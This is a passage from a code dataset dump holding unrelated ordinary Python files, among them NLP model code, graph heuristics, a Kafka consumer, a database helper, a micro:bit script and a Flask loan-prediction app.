enumerate(sentence):\n np_type = token.pos_ if token.pos_ in {'NOUN', 'PROPN'} else 'NONE'\n if np_type != cur_np:\n if cur_np != 'NONE':\n noun_chunks.add((np_start, i))\n if np_type != 'NONE':\n np_start = i\n cur_np = np_type\n if cur_np != 'NONE':\n noun_chunks.add((np_start, len(sentence)))\n return [sentence[s:e] for (s, e) in sorted(noun_chunks)]\n\ndef filter_noun_chunks(chunks, exclude_pronouns=False, exclude_query=None, exact_match=False):\n if exclude_pronouns:\n chunks = [\n np for np in chunks if (\n np.lemma_ != '-PRON-'\n and not all(tok.pos_ == 'PRON' for tok in np)\n )\n ]\n\n if exclude_query is not None:\n excl_txt = [exclude_query.lower()]\n filtered_chunks = []\n for chunk in chunks:\n lower_chunk = chunk.text.lower()\n found = False\n for excl in excl_txt:\n if (\n (not exact_match and (lower_chunk in excl or excl in lower_chunk))\n or lower_chunk == excl\n ):\n found = True\n break\n if not found:\n filtered_chunks.append(chunk)\n chunks = filtered_chunks\n\n return chunks\n\nclass ELECTRAWSCTrickModel(nn.Module):\n def __init__(self, discriminator, pad_idx):\n super().__init__()\n self.model = discriminator\n self.pad_idx = 
pad_idx\n \n def forward(self, *xb):\n \"\"\"\n prefix: (B, L_p)\n suffix: (B, L_s)\n cands: (B, L_c)\n cand_lens: (B, L_cl)\n \"\"\"\n batch_size = xb[0].shape[0]\n\n all_scores = []\n n_cands = []\n for i in range(batch_size):\n # unpad\n prefix, suffix, cands, cand_lens = self.depad(xb[0][i]), self.depad(xb[1][i]), self.depad(xb[2][i]), self.depad(xb[3][i])\n # unpack and pad into (#candidate, max_len)\n cands = cands.split(cand_lens.tolist()) # split into list of tensors, ith has length of cand_lens[i]\n max_len = max(len(cand) for cand in cands) + len(prefix) + len(suffix)\n sents, masks = [], []\n for cand in cands:\n pad_len = max_len - len(prefix) - len(suffix) - len(cand)\n sents.append( torch.cat([prefix,cand,suffix,cand.new_full((pad_len,),self.pad_idx)]) )\n masks.append( torch.cat([cand.new_zeros(len(prefix)),cand.new_ones(len(cand)),cand.new_zeros(max_len-len(prefix)-len(cand))]) )\n sents = torch.stack(sents) # (#candidate, max_len)\n masks = torch.stack(masks) # (#candidate, max_len)\n # get discrimiator scores for each candidate\n logits = self.model(sents) # (#candidate, max_len)\n scores = (logits * masks).sum(dim=-1) # (#candidate,)\n scores = scores / masks.sum(dim=-1)\n # save\n all_scores.append(scores)\n n_cands.append(scores.shape[0])\n # repack\n all_scores = torch.cat(all_scores) # (#total candidate in this batch,)\n n_cands = torch.tensor(n_cands, device=all_scores.device) # (B,)\n return all_scores, n_cands\n\n def depad(self, tensor):\n mask = tensor != self.pad_idx\n return tensor.masked_select(mask)\n\ndef wsc_trick_predict(preds):\n \"\"\"\n all_scores: (#total candidates in the dataset,)\n n_cands: (#samples in the dataset,)\n \"\"\"\n all_scores, n_cands = preds\n predicted = []\n for scores in all_scores.split(n_cands.tolist()):\n query_score = scores[0]\n other_scores = scores[1:]\n predicted.append((query_score <= other_scores).all())\n return torch.stack(predicted).int()\n\nclass ELECTRAWSCTrickLoss():\n def __init__(self):\n self.criterion = nn.BCEWithLogitsLoss()\n \n def __call__(self, x, y):\n all_scores, n_cands = x\n all_labels = []\n for scores in all_scores.split(n_cands.tolist()):\n n_cand = len(scores)\n labels = scores.new_ones(n_cand)\n labels[0] = 0.\n all_labels.append(labels)\n all_labels = torch.cat(all_labels) # (#total candidate in this batch,)\n return self.criterion(all_scores, all_labels)\n\n def decodes(self, preds): return wsc_trick_predict(preds)\n\ndef accuracy_electra_wsc_trick(preds, targs):\n predicts = wsc_trick_predict(preds)\n return (predicts == targs).float().mean()\n\ndef wsc_trick_merge(outs):\n all_scores = torch.stack([out[0] for out in outs]).mean(dim=0)\n n_cands = outs[0][1]\n return all_scores, n_cands","sub_path":"_utils/wsc_trick.py","file_name":"wsc_trick.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267841506","text":"import numpy as np\n\nimport networkx as nx\n\nfrom garageofcode.nphard.tsp import TSPath\n\ndef get_random_graph(n, rate, directed=False):\n if directed:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n\n for i in range(n):\n G.add_node(i)\n\n for i in range(n):\n for j in range(i+1, n):\n if np.random.random() < rate:\n if directed:\n if np.random.random() < 0.5:\n G.add_edge(i, j)\n else:\n G.add_edge(j, i)\n else:\n G.add_edge(i, j)\n return G\n\ndef get_unsatisfied(tspath): # assumes 0/1 graph\n path = tspath.get_path()\n for u in path + [path[0]]:\n if tspath.D[u, tspath.G[u]]:\n return 
u\n    return None\n\ndef rnr_cross(G, tspath):\n    #tspath = TSPath(D=D)\n    N = len(G)\n    tspath.greedy_init()\n    score = tspath.get_score()\n\n    for i in range(10000):\n        u = get_unsatisfied(tspath)\n        if u is None:\n            return \n\n        nodes = set(G[u]) | {u}\n        prev_G = {u: tspath.G[u] for u in tspath.G}\n        singles = list(tspath.ruin(nodes))\n        \n        # recreate step\n        tspath.recreate(singles)\n\n        tspath.exhaust_crosses()\n\n        new_score = tspath.get_score()\n        if new_score <= score:\n            score = new_score\n        else:\n            # reverse changes\n            tspath.G = prev_G\n\n        if tspath.get_pathlen() < N:\n            print(\"i:\", i)\n            print(\"u:\", u)\n            print(\"G:\", tspath.G)\n            raise RuntimeError(\"dropped nodes!\")\n        #for u in range(N):\n        #    tspath.recreate(list(tspath.ruin([u])))\n\n\ndef main():\n    N = 100\n    rate = 0.1\n\n    G = get_random_graph(N, rate)\n    D = np.zeros([N, N])\n    for i in range(N):\n        for j in range(i):\n            if j in G[i]:\n                D[i, j] = 0\n            else:\n                D[i, j] = 1\n    D = D + D.T\n\n    tspath = TSPath(D=D)\n    tspath.greedy_init()\n    greedy_score = tspath.get_score()\n    tspath.exhaust_crosses()\n    cross_score = tspath.get_score()\n    rnr_cross(G, tspath)\n    rnr_score = tspath.get_score()\n\n    print(\"Greedy score: {0:.1f}\".format(greedy_score))\n    print(\"Cross score: {0:.1f}\".format(cross_score))\n    print(\"RnR score: {0:.1f}\".format(rnr_score))\n\n\nif __name__ == '__main__':\n    main()","sub_path":"garageofcode/nphard/hamiltonian.py","file_name":"hamiltonian.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"595621507","text":"# coding=utf-8\r\nfrom spillebrett import Spillebrett\r\nfrom celle import Celle\r\n#imports the 2 classes\r\n\r\ndef main():\r\n\r\n    print(\"\")\r\n    #2 inputs asking the user how big they want the grid\r\n    inp1 = int(input(\"How many rows? (across): \"))\r\n    inp2 = int(input(\"How many columns? (down): \"))\r\n    #calls the Spillebrett class with the 2 inputs as arguments\r\n    spill1 = Spillebrett(inp2, inp1)\r\n\r\n    #empty input, so the user is not asked anything before the while loop has run\r\n    inp = \"\"\r\n\r\n    #while inp ^ (and inside the loop) is not q, the code runs\r\n    while inp != \"q\":\r\n        #big line break\r\n        print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\n        #makes a border around the grid matching the length of the rows\r\n        border = \"\"\r\n        for x in range(inp1):\r\n            border += \"---\"\r\n        print(border)\r\n\r\n        #calls the object's 2 methods, which draw the grid and then update it\r\n        spill1.tegnBrett()\r\n        spill1.oppdatering()\r\n\r\n        #The number of living cells is printed via the \"finnAntallLevende()\" method\r\n        print(\"Number of living cells: \", spill1.finnAntallLevende())\r\n        print(border)\r\n\r\n        #input asking the user whether to quit or continue - tied to the while loop\r\n        inp = input(\"Press enter to continue. Type q and press enter to quit: \")\n\n# starts the main program\nmain()","sub_path":"innlevering8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"546838421","text":"from microbit import *\r\ndrop = Image(\"00900:\"\r\n             \"09590:\"\r\n             \"95559:\"\r\n             \"95559:\"\r\n             \"09990\")\r\ndispenseCount = 0\r\nwhile True:\r\n    reading = pin0.read_analog()\r\n    if (reading < 800):\r\n        display.show(drop)\r\n        pin1.write_digital(1)\r\n        sleep(2000)\r\n        pin1.write_digital(0)\r\n        sleep(10000)\r\n        dispenseCount += 1\r\n        display.scroll(\"Water count \")\r\n        display.scroll(str(dispenseCount))","sub_path":"AutoPlantWaterer.py","file_name":"AutoPlantWaterer.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"91717269","text":"# -*- python -*-\r\n# -*- coding: utf-8 -*-\r\n#\r\n# IdDict : container package\r\n#\r\n# Copyright or Copr. 2006 INRIA - CIRAD - INRA\r\n#\r\n# File author(s): Jerome Chopard \r\n#\r\n# Distributed under the Cecill-C License.\r\n# See accompanying file LICENSE.txt or copy at\r\n# http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html\r\n#\r\n# VPlants WebSite : https://gforge.inria.fr/projects/vplants/\r\n#\r\n\r\n__doc__=\"\"\"\r\nThis module provides a dictionary that creates keys when needed\r\n\"\"\"\r\n\r\n__license__= \"Cecill-C\"\r\n__revision__=\" $Id: id_dict.py 15635 2014-01-31 16:14:30Z boudon $ \"\r\n\r\nfrom id_generator import IdMaxGenerator,IdSetGenerator,IdListGenerator\r\n\r\nIdGen = {\"max\":IdMaxGenerator,\r\n         \"set\":IdSetGenerator,\r\n         \"list\":IdListGenerator}\r\n\r\nclass IdDict (dict) :\r\n    \"\"\"\r\n    store a tuple of (id,elm)\r\n    create an id when needed\r\n    \"\"\"\r\n    def __init__ (self, *args, **kwdargs) :\r\n        try :\r\n            gen_name = kwdargs.pop(\"idgenerator\")\r\n        except KeyError :\r\n            gen_name = \"set\"\r\n        dict.__init__(self,*args,**kwdargs)\r\n        \r\n        self._gen_id_generator(gen_name)\r\n        \r\n        for k,v in self.iteritems() :\r\n            self._id_generator.get_id(k)\r\n\r\n    def _gen_id_generator(self, gen_name = 'set'): \r\n        try :\r\n            self._id_generator=IdGen[gen_name]()\r\n        except KeyError :\r\n            raise UserWarning(\"the required id generator (%s) is unknown,\\navailable generator are %s\" % (gen_name,str(IdGen.keys())) )\r\n    \r\n    def add (self, val, key=None) :\r\n        try :\r\n            key=self._id_generator.get_id(key)\r\n            dict.__setitem__(self,key,val)\r\n            return key\r\n        except IndexError :\r\n            raise KeyError(key)\r\n\r\n    def __deepcopy__(self, memo):\r\n        from copy import deepcopy\r\n        newval = IdDict()\r\n        for key,val in self.iteritems():\r\n            dict.__setitem__(newval,deepcopy(key,memo),deepcopy(val,memo))\r\n        newval._id_generator = deepcopy(self._id_generator,memo)\r\n        return newval\r\n    ################################################\r\n    #\r\n    # dict interface\r\n    #\r\n    ################################################\r\n    def __delitem__ (self, key) :\r\n        dict.__delitem__(self,key)\r\n        self._id_generator.release_id(key)\r\n\r\n    def __setitem__ (self, key, val) :\r\n        if key not in self :\r\n            if not hasattr(self,'_id_generator') : self._gen_id_generator()\r\n            self._id_generator.get_id(key)\r\n        dict.__setitem__(self,key,val)\r\n\r\n    def clear (self) :\r\n        dict.clear(self)\r\n        self._id_generator.clear()\r\n\r\n    def copy (self) :\r\n        return IdDict(self)\r\n\r\n    def pop (self, key, *args) :\r\n        try :\r\n            val=dict.pop(self,key)\r\n
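# the key has left the dict, so hand its id back to the generator for reuse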
self._id_generator.release_id(key)\r\n return val\r\n except KeyError :\r\n if len(args)>0 :\r\n return args[0]\r\n else :\r\n raise\r\n\r\n def popitem (self) :\r\n key,val=dict.popitem(self)\r\n self._id_generator.release_id(key)\r\n return key,val\r\n\r\n def setdefault (self, key, *args) :\r\n if key not in self :\r\n self._id_generator.get_id(key)\r\n return dict.setdefault(key,*args)\r\n\r\n def update (self, E, **F) :\r\n raise NotImplementedError(\"lapin compris\")\r\n","sub_path":"Openalea/CPIBOpenAlea/sa_oa/container/utils/id_dict.py","file_name":"id_dict.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292615270","text":"# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom cinder.api import common\nfrom cinder.openstack.common import log as logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ViewBuilder(common.ViewBuilder):\n \"\"\"Model volume replication API responses as a python dictionary.\"\"\"\n\n _collection_name = \"os-volume-replication\"\n\n def __init__(self):\n \"\"\"Initialize view builder.\"\"\"\n super(ViewBuilder, self).__init__()\n\n def summary_list(self, request, replications):\n \"\"\"Show a list of replications without many details.\"\"\"\n return self._list_view(self.summary, request, replications)\n\n def detail_list(self, request, replications):\n \"\"\"Detailed view of a list of replications .\"\"\"\n return self._list_view(self.detail, request, replications)\n\n def summary(self, request, relationship):\n \"\"\"Generic, non-detailed view of a relationship.\"\"\"\n return {\n 'relationship': {\n 'id': relationship['id'],\n 'primary_id': relationship['primary_id'],\n 'status': relationship['status'],\n 'links': self._get_links(request,\n relationship['id']),\n },\n }\n\n def detail(self, request, relationship):\n \"\"\"Detailed view of a single relationship.\"\"\"\n return {\n 'relationship': {\n 'id': relationship['id'],\n 'primary_id': relationship['primary_id'],\n 'secondary_id': relationship['secondary_id'],\n 'status': relationship['status'],\n 'extended_status': relationship['extended_status'],\n 'links': self._get_links(request, relationship['id']),\n }\n }\n\n def _list_view(self, func, request, relationships):\n \"\"\"Provide a view for a list of relationships.\"\"\"\n r_list = [func(request, rel)['relationship'] for rel in\n relationships]\n r_links = self._get_collection_links(request, relationships,\n self._collection_name)\n r_dict = dict(relationships=r_list)\n\n if r_links:\n r_dict['relationships_links'] = r_links\n\n return r_dict\n","sub_path":"cinder/api/views/replications.py","file_name":"replications.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508331752","text":"from lesson_unittest_support import KarmaLessonTestCase\nimport time\n\nclass Test(KarmaLessonTestCase):\n def select_option(self, i):\n 
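# build the XPath for the i-th answer option, click it, and give the page a moment to react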
locator = '//div[@id=\\'optionSection\\']/div[%s]' % i\n self.selenium.click(locator);\n time.sleep(1)\n\n def test_test(self):\n self.selenium.open(self.url)\n correct_options = [3, 1, 4, 1, 3, 2, 4]\n for option in correct_options:\n self.select_option(option)\n self.assertTrue(self.selenium.is_visible('//div[@id=\\'gameOver\\']'))\n\n def test_wrong(self):\n import os\n self.selenium.open(self.url)\n self.select_option(1)\n self.assertTrue(self.selenium.is_visible('//div[@id=\\'listenAgain\\']'))\n self.assertScreenshotEquals('wrong.png')\n","sub_path":"lessons/identification-animals/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522888909","text":"__author__ = 'MG'\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n# 更改了树的结构,不建议这种方法\nclass Solution(object):\n def rob(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root == None:\n return 0\n\n self.robHelp(root)\n\n return root.val\n\n\n def robHelp(self, root):\n if root == None:\n return 0\n\n root.val += self.robHelp(root.left) + self.robHelp(root.right)\n\n pre = 0\n if root.left != None:\n pre += root.left.val\n\n if root.right != None:\n pre += root.right.val\n\n root.val = max(pre,root.val)\n\n return pre\n","sub_path":"LeetCode/HouseRobberIII.py","file_name":"HouseRobberIII.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"200785323","text":"from QuickPotato.configuration.management import options\nfrom QuickPotato.database.schemas import RawStatisticsSchemas, UnitPerformanceTestResultSchemas\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom QuickPotato.utilities.exceptions import DatabaseConnectionCannotBeSpawned, DatabaseSchemaCannotBeSpawned\nfrom sqlalchemy_utils import database_exists, create_database, drop_database\nimport tempfile\n\n\nclass ContextManager(RawStatisticsSchemas, UnitPerformanceTestResultSchemas):\n\n URL = options.connection_url\n\n def __init__(self):\n RawStatisticsSchemas.__init__(self)\n UnitPerformanceTestResultSchemas.__init__(self)\n\n def spawn_engine(self, database_name):\n \"\"\"\n :return:\n \"\"\"\n try:\n url = self._validate_connection_url(database_name=database_name)\n engine = create_engine(url, echo=options.enable_database_echo)\n return engine\n\n except Exception:\n raise DatabaseConnectionCannotBeSpawned()\n\n def spawn_connection(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n try:\n engine = self.spawn_engine(database_name)\n return engine, engine.connect()\n\n except Exception:\n raise DatabaseConnectionCannotBeSpawned()\n\n @staticmethod\n def close_connection(engine, connection):\n \"\"\"\n\n :param engine:\n :param connection:\n :return:\n \"\"\"\n connection.close()\n engine.dispose()\n return True\n\n @staticmethod\n def execute_query(connection, query):\n \"\"\"\n\n :param connection:\n :param query:\n :return:\n \"\"\"\n return connection.execute(query)\n\n def create_schema(self, database, schema):\n \"\"\"\n\n :param database:\n :param schema:\n :return:\n \"\"\"\n engine = self.spawn_engine(database)\n schema.metadata.create_all(engine)\n engine.dispose()\n return True\n\n def create_database(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n try:\n # Add check for 
SQLite\n engine = self.spawn_engine(database_name)\n if not database_exists(engine.url):\n create_database(engine.url)\n engine.dispose()\n\n except ProgrammingError:\n # Database exists no need to re-create it\n pass\n\n except Exception:\n raise DatabaseSchemaCannotBeSpawned()\n\n def delete_database(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n engine = self.spawn_engine(database_name)\n if database_exists(engine.url):\n drop_database(engine.url)\n return True\n\n def _validate_connection_url(self, database_name):\n \"\"\"\n :return:\n \"\"\"\n if self.URL is None:\n path = tempfile.gettempdir()\n path = path + \"\\\\\" if '\\\\' in path else path + \"/\"\n return \"sqlite:///\" + path + database_name + \".db\"\n\n elif options.connection_url.startswith('sqlite'):\n return self.URL + database_name + \".db\"\n\n else:\n return f\"{self.URL}/{database_name}\"\n","sub_path":"QuickPotato/database/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579513276","text":"#! python3\r\n# mapIt.py - Launches a map in the browser using an address from the command line or clipboard.\r\nimport webbrowser, sys, pyperclip\r\n\r\n# from command line just put \"mapit \"address\"\"\r\nif len(sys.argv) > 1:\r\n # Get address from command line. all but the 1st elem is concatenated\r\n address = ' '.join(sys.argv[1:])\r\nelse:\r\n address = pyperclip.paste\r\nwebbrowser.open(\"https://www.google.com/maps/place/{}\".format(address))\r\n","sub_path":"Projects/Cool scripts/Mapit.py","file_name":"Mapit.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"36225758","text":"#!/usr/bin/env python\n#coding: utf-8\nimport threading, logging, time, sys\nfrom kafka import KafkaConsumer\nfrom pykafka import KafkaClient\n\n\"\"\"\nBalancedConsumer.consume获取消息类型[pykafka.protocol.Message]:\n \"compression_type\",\n \"partition_key\",\n \"value\",\n \"offset\",\n \"partition_id\",\n \"partition\",\n \"produce_attempt\",\n \"delivery_report_q\"\n\"\"\"\n\nclass PYKafkaConsumer(threading.Thread):\n daemon = True\n\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print >> sys.stderr, \"pykafka consumer runing\"\n client = KafkaClient(hosts=\"172.16.20.25:9092,172.16.20.25:9093,172.16.20.25:9094\")\n print >> sys.stderr, client.topics\n topic = client.topics['cluster_test']\n print >> sys.stderr, topic\n balanced_consumer = topic.get_balanced_consumer(consumer_group='consumerTest', auto_commit_enable=True, zookeeper_connect=\"172.16.20.25:2181, 172.16.20.26:2181\", auto_commit_interval_ms=1000) # 默认为60 * 1000\n print >> sys.stderr, \"consumer subscribe\"\n while True:\n #print >> sys.stderr, \"offset: \", consumer.offsets(group=\"consumerTest\")\n message = balanced_consumer.consume()\n #print >> sys.stderr, type(message)\n print >> sys.stderr, message.value\n #print >> sys.stderr, message\n\nclass KafkaConsumerTest(threading.Thread):\n daemon = True\n\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print >> sys.stderr, \"consumer runing\"\n consumer = KafkaConsumer(bootstrap_servers=(\"localhost:9092\",\"localhost:9093\",\"localhost:9094\"), client_id=\"kafkaConsumerTest\", group_id=\"consumerTest\", auto_offset_reset='latest')\n #consumer = 
KafkaConsumer(bootstrap_servers=\"localhost:9092\", auto_offset_reset='earliest')\n consumer.subscribe([\"cluster_test\"])\n print >> sys.stderr, \"consumer subscribe\"\n for message in consumer:\n #print >> sys.stderr, \"offset: \", consumer.offsets(group=\"consumerTest\")\n print >> sys.stderr, message\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s', level=logging.INFO)\n mth = KafkaConsumerTest(\"consumer\")\n mth.start()\n time.sleep(3600)\n #mth.join()\n","sub_path":"project/kafka/example/python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173690376","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017年5月16日\n\n@author: MJ\n\"\"\"\nfrom __future__ import absolute_import\nimport os\nimport sys\np = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nif p not in sys.path:\n sys.path.append(p)\nimport numpy as np\nfrom word2vec.word2vec_by_gensim_utils import get_word_2_vec_by_gensim_for_sogou_classification\nfrom constant import MAX_DOCUMENT_LENGTH\n\n\ndef default_tokenizer():\n return lambda x: x.split()\n\n\nclass SimpleTextConverter(object):\n\n def __init__(self, word_vec, max_document_length, tokenizer_fn=None):\n self.syn0norm = word_vec.syn0norm\n self.vocab = word_vec.vocab\n self.tokenizer_fn = tokenizer_fn or default_tokenizer()\n\n self.max_document_length = max_document_length\n\n def transform_to_ids(self, raw_documents):\n for text in raw_documents:\n tokens = self.tokenizer_fn(text)\n word_ids = np.zeros(self.max_document_length, np.int64)\n\n idx = 0\n for token in tokens:\n if token not in self.vocab:\n continue\n if idx >= self.max_document_length:\n break\n word_ids[idx] = self.vocab[token].index\n idx += 1\n yield word_ids, idx\n\n\ntext_converter_for_sogou_classification = None\n\n\ndef get_text_converter_for_sogou_classification(max_document_length=MAX_DOCUMENT_LENGTH, tokenizer_fn=None):\n \"\"\"\n 由于使用全局变量, 第一次初始化后tokenizer_fn不可更新\n \"\"\"\n global text_converter_for_sogou_classification\n if not text_converter_for_sogou_classification:\n word_vec = get_word_2_vec_by_gensim_for_sogou_classification()\n text_converter_for_sogou_classification = SimpleTextConverter(word_vec, max_document_length, tokenizer_fn)\n return text_converter_for_sogou_classification\n","sub_path":"word2vec/data_convert.py","file_name":"data_convert.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501357470","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport numpy as np\nfrom simulator.instance import Instance\nfrom solver.antennaLocation import AntennaLocation\nfrom tqdm import tqdm\n\nif __name__ == '__main__':\n # Parameters\n time_limit = 2 * 60 * 60 # maximum execution time in seconds\n output_file = \"./results/exp_general_table_ratio_NxN.csv\" # output file\n seeds_number = 10 # Number of seeds\n row_min = 3 # Minimum number of rows\n row_max = 10 # Maximum number of rows\n\n log_name = \"./logs/main.log\"\n logging.basicConfig(filename=log_name, format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO, datefmt=\"%H:%M:%S\", filemode='w')\n fp = open(\"./etc/config.json\", 'r')\n sim_setting = json.load(fp)\n fp.close()\n\n for row in tqdm(range(row_min, 
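The consumer.py record above is Python 2 throughout (`print >> sys.stderr`). A rough Python 3 equivalent of its kafka-python branch — the broker addresses, topic, and group id are the record's own values, but treat this as an untested sketch:

import sys
from kafka import KafkaConsumer  # kafka-python package

consumer = KafkaConsumer(
    bootstrap_servers=["localhost:9092", "localhost:9093", "localhost:9094"],
    client_id="kafkaConsumerTest",
    group_id="consumerTest",
    auto_offset_reset="latest",
)
consumer.subscribe(["cluster_test"])
for message in consumer:
    # Each message is a ConsumerRecord(topic, partition, offset, key, value, ...)
    print(message, file=sys.stderr)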
row_max)):\n for seed in range(seeds_number):\n for demand in range(sim_setting['max_capacity']):\n np.random.seed(seed)\n sim_setting['max_demand'] = demand+1\n sim_setting['min_demand'] = demand+1\n sim_setting['antenna_row'] = row\n sim_setting['antenna_column'] = row\n\n inst = Instance(sim_setting)\n dict_data = inst.get_data()\n\n prb = AntennaLocation(dict_data)\n\n # Solver\n of_exact, sol_exact, sol_q, comp_time_exact, flagSolver = prb.solve(dict_data, verbose=False, time_limit=time_limit)\n\n file_output = open(output_file, \"a\")\n file_output.write(f\"{seed},{sim_setting['antenna_row']},{sim_setting['antenna_column']},{sim_setting['max_capacity']},{sim_setting['min_capacity']},{sim_setting['max_demand']},{sim_setting['min_demand']},{sim_setting['max_cost']},{sim_setting['min_cost']},{'solver'},{sim_setting['max_demand']/sim_setting['max_capacity']},{comp_time_exact},{of_exact},{flagSolver}\\n\")\n file_output.close()","sub_path":"mainIterRatio.py","file_name":"mainIterRatio.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"407825731","text":"from flask import Flask,render_template,url_for,request\nimport pandas as pd\nimport pickle\n\n\napp=Flask(__name__)\n\n@app.route('/')\n\ndef home():\n return render_template('index.html')\n\n@app.route('/result',methods=['POST'])\ndef predict():\n # Getting the data from the form\n loan_amnt=request.form['loan_amnt']\n term=request.form['term']\n int_rate=request.form['int_rate']\n emp_length=request.form['emp_length']\n home_ownership=request.form['home_ownership']\n annual_inc=request.form['annual_inc']\n purpose=request.form['purpose']\n dti=request.form['dti']\n delinq_2yrs=request.form['delinq_2yrs']\n revol_util=request.form['revol_util']\n total_acc=request.form['total_acc']\n longest_credit_length=request.form['longest_credit_length']\n verification_status=request.form['verification_status']\n # creating a json object to hold the data from the form\n input_data=[{\n 'loan_amnt':loan_amnt,\n 'term':term,\n 'int_rate':int_rate,\n 'emp_length':emp_length,\n 'home_ownership':home_ownership,\n 'annual_inc':annual_inc,\n 'purpose':purpose,\n 'dti':dti,\n 'delinq_2yrs':delinq_2yrs,\n 'revol_util':revol_util,\n 'total_acc':total_acc,\n 'longest_credit_length':longest_credit_length,\n 'verification_status':verification_status}]\n\n\n dataset=pd.DataFrame(input_data)\n\n dataset=dataset.rename(columns={\n 'loan_amnt':'loan_amnt',\n 'term':'term',\n 'int_rate':'int_rate',\n 'emp_length':'emp_length',\n 'home_ownership':'home_ownership',\n 'annual_inc':'annual_inc',\n 'purpose':'purpose',\n 'dti':'dti',\n 'delinq_2yrs':'delinq_2yrs',\n 'revol_util':'revol_util',\n 'total_acc':'total_acc',\n 'longest_credit_length':'longest_credit_length',\n 'verification_status':'verification_status'})\n\n dataset[['loan_amnt','int_rate','emp_length','annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 'total_acc','longest_credit_length']] = dataset[['loan_amnt','int_rate','emp_length','annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 'total_acc','longest_credit_length']]\n\n dataset[['term','home_ownership','purpose','verification_status']]=dataset[['term','home_ownership','purpose','verification_status']].astype('object')\n\n dataset = dataset[['loan_amnt','term','int_rate','emp_length',\n 'annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 'total_acc','longest_credit_length','home_ownership','purpose','verification_status']]\n model = 
pickle.load(open('Random_Forest.pkl', 'rb'))\n classifier=model.predict(dataset)\n predictions = [item for sublist in RF_cls for item in sublist]\n colors = ['#1f77b4','#ff7f0e']\n loan_status = ['Approved','Not Approved']\n return render_template('index.html',prediction_text=f'Your Loan is {loan_status}')\n\n p = figure(x_range=loan_status, plot_height=500,\n toolbar_location=None, title=\"Loan Status\", plot_width=800)\n p.vbar(x='loan_status', top='predictions', width=0.4, source=source, legend=\"loan_status\",\n line_color='black', fill_color=factor_cmap('loan_status', palette=colors, factors=loan_status))\n\n\n p.xgrid.grid_line_color = None\n p.y_range.start = 0.1\n p.y_range.end = 0.9\n p.legend.orientation = \"horizontal\"\n p.legend.location = \"top_center\"\n p.xaxis.axis_label = 'Loan Status'\n p.yaxis.axis_label = ' Predicted Probabilities'\n script, div = components(p)\n return render_template('result.html',script=script,div=div)\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267341492","text":"import numpy as np\nimport pandas as pd\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport 